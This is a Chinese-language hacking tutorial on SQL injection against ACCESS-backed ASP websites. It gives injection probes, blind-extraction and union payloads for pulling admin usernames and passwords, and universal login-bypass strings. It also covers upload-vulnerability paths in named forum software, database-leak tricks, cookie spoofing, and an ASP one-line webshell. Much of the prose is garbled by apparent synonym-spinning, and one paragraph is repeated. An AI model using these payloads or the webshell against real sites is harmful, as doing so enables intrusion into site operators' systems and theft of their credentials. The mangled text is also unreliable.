ACCESSSQL注入

本文由zoujialan贡献
同一、注入点的判断与猜解
1.在单引号 ’提交,
结果:如果出现错误提示,则该网站可能就是存在注入漏洞。
2.数字型判断是否有渗;
语句:and 1=1 ;and 1=2 (经典)、’ and ‘1’=1(字符型)
结果:分别返回不同的页面,说明在注入漏洞.
浅析:and 的意是“和”如果无过滤我们的言语,and 1=1便会见让取代入SQL查询语句进行询问,
要是and前后的简单久告句都是真的语虽非会见出错,但若前后语句有一个为假的话,程序即使会见暴错。
呢便标志程序来渗漏洞
谨防注入解决办法:
1>使用or 2>1 ; or 1>2来开展判断
  结果:分别返回不同的页面,说明在注入漏洞.
  分析:or注入只要求前后两单话如果有一个对就也真正,如果前后两个报告句都是是的,反而为
假。
   记住:or注入时,or后面的话语如果是无可非议的,则赶回错误页面!如果是不对,则归正确页面
,说明有注入点。
2> 使用xor 1=1; xor 1=2
   结果:分别返回不同的页面,说明在注入漏洞.
   分析:xor 代表着异或,意思就是连续的表达式仅来一个啊确实时候才为真正。
   记住:xor注入时,xor后面的语句如果是是的,则归错误页面积,如果是大错特错,则赶回正确
页面,说明是注入点。
3>把and 1=1变成URL编码形式后以交付
  and 1=1 URL编码:%41%4E%44%20%%31%3D%31
4>使用-1;-0
  分析:如果回到的页面及前边不同,是其余一样虽新闻,则象征来渗漏洞,是数字型的注入漏洞;在 
URL地址后长 -0,URL变成 news.asp?id=123-0,返回的页面及前边的
页面相同,加上-1,返回错误页面,则也象征有注入漏洞.
3.字符型判断是否来渗:
  语句:’ and ‘1’=1;’ and  ‘1=2(经典)
  结果:结果:分别返回不同之页面,说明有注入漏洞.
  分析:加入’ and ‘1’=1回正确页面,加入’ and  ‘1=2赶回错误页面,说明有渗漏同。
  防注入解决办法:
  1>在URL的地方后长’%2B’(字符型)
  分析:URL地址变为:news.asp?id=123’%2B’,返回的页面及1同;加
上’2%2B’asdf,URL地址变为:news.asp?id=123’%2Basdf,返回的页面及1
不同,或者说非发现该条记下,或者不当,则代表在注入点,是文本型的。
4.搜索型判断是否发渗:
简言之的论断搜索型注入漏洞存在未设有的道是事先搜索’,如果差,说明90%是是漏洞。然后搜
索%,如果正常返回,说明95%闹洞了。
说明:加入如”&;”、”[“、”]”、”%”、”$”、”@”等特殊字符,都可以实现,如果起谬误,说明有题目
操作:
寻一个根本字,比如2006咔嚓,正常返回所有2006系的音信,再寻找2006%’and 1=1 and ‘%’=’和
2006%’and 1=2 and ‘%’=’,存在异议的话,就是100%出洞了。
关键字%’ and 1=1 and ‘%’=’%
关键字%’ and 1=2 and ‘%’=’%
用and 1=1 换成注入语句就足以了
5.判断数据库类型:and user>0  例如:showdetail.asp?id=49 ;and user>0 
若是是ACCESS数据库,那么回的荒谬里一般会出”Microsoft JET Database”关键得,如果是MSSQL数
本库的语句返回的失实提示里一般会蕴藏”SQL Server”关键了.
6.猜表名 and exists (select * from 表名)
  说明:意思和方一样,只是用的语名不等同。
7.猜列名 and (select count(列名) from 表名)>0
  说明:如果我们输入的列名猜解正确吧反回正常页面
8.猜长度 and (select top 1 len(username) from admin)>0
  说明:如果我们输入的尾声一各类数据返回错误,而不当前一样各数字返回正确,说明自身所猜解的长短
为正确。
9.猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii码1-128
  说明:如果我们输入的结尾一各类数据返回错误,而不当前无异各数字返回正确,说明我所猜解的数字
不错。(可以用折半法猜内容)
折半法:最小值与极端酷值差的一半,比如输入50归正确,输入100回错误,折半晚输入75。
10.同台查询注入(union查询)
操作步骤:
1>在正规说话后台加入 and 1=2 union select * form 表名,其中*声泪俱下表示字段数量,从1直接增加
(and 1=2 union select 1,2,3,4 form 表名)如果字段往往是就会见发生暴错。
2>在页面显示数字之地方用真得的字段名代替,如:username,password.
3>在页面字段值处暴出真的数据库字段值。
老二、查找后台地址,找到后台用赢得的用户管理员的帐户与密码进行摘登陆.
三、上传WEBSHELL
法要有:
1.达成传漏洞: 如果看:选择而如达成传的文件 [重复上污染]要么出现“请登陆后以”,80%即使发生尾巴
了! 有时上传不一定会中标,这是以Cookies不一样.咱们且用WSockExpert取得Cookies.再用 
DOMAIN上传或是桂林老兵上传工具.
1>上污染漏洞的文本
  动网是upfile.asp。
  动易是以upfile_soft.asp,(软件达到污染漏洞)upfile_softpic.asp(图片上传漏洞)
  动感是在uploadflash.asp,upfile_flash.asp,利用抓包工具抓包获得cookies,再就此   DOMAIN上
传或是桂林红军上污染工具
2>添加上传类型
  asa|asaspp
3>就是于直达传时在后缀后面加空格或者加几碰,也许也会见来异之意识。例:*.asp ,*.asp..。
4>上污染图片文件木马,使用备份数据库得到asp文件
2.cookies欺骗
  使用cookies可以上为网站认识您的目的。但是要cookies验证不足就会见形成cookies欺骗。用  
暨工具 桂林老兵cookies欺骗工具。
3.%5c暴库
  把二级目录中的/换成%5c EY:otherweb … s.asp?BigClassName=职
责范围&;BigClassType=1 万一您能顾:’E:\ahttc040901
\otherweb\dz\database\iXuEr_Studio.asa’不是一个管用的 路径。 确定路径名称拼写是否是,
暨是否 连接到文件存放的服务器。 这样的就是是数据库了。下载时用FLASHGET换成.MDB格式的哪怕执行

4.conn.asp暴库
  这个邪是较一直的尾巴,利用价值不怪
5.’or’=’or’万能够密码登陆
  ’or’=’or’这是一个可以接连SQL的语名句.可以一直上后台。我搜集了一下。类似之还有 : 
  ’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’ a’=’a  
  一个非常老的应用方式,主要用来一些于老的网站。
6.其它流淌,也便是超过站. 我们入侵某站时或许这站坚固的无懈可击,我们可以查找下和斯站同一服务
厚底站点,然后在利 用之站点用提权,嗅探等办法来侵犯我们 要入侵的站点。,在这边产生只困难
,就是部分服务器 的绝对路径经过加密,这虽看我们的本事了 
7.描绘入ASP格式数据库。就是一模一样句子话木马[〈%execute request(“value”)%〉 ],常用在留言本. 如:
夫就算是ASP格式的数据库或者好写副内容之
ASP文件,如南方数据的系统布局],再写 入一词话木马.
8.旁流动,也尽管是超过站. 我们入侵某站时可能是站坚固的无懈可击,我们得以寻找下与夫站同一服务
重视底站点,然后以利 用这个站点用提权,嗅探等艺术来侵犯我们 要入侵之站点。,在此间来只难点
,就是部分劳动器 的绝对路径经过加密,这就是看我们的本事了
季、整站利用
    动网BBS 可以事先用:dvbbs权限提升工具,使从曾变为前 
   台管理员。 THEN,运用:动网固顶贴工具,找个固顶贴,再赢得COOKIES,这个要你从曾召开。我   
等可就此 WSockExpert取得Cookies/NC包 这个自己便非做了,网上教程多的凡,自曾生只省。     
工具:dvbbs权限提升工具 动网固顶贴工具
总结:
私认为ACCESS网站注比不是雅灵敏,方法大家还亮,针对国内的网站的话大家好交网站寻找
网站是采用什么程序改过来的,现在貌似都是以曾在的商店网站系统来进行修改。

产一致首整理MSSQL注入方法,MSSQL注入十分之利落,功能也特意强大.只要找到注入点,一般
场面下是得用下来的,

相关文章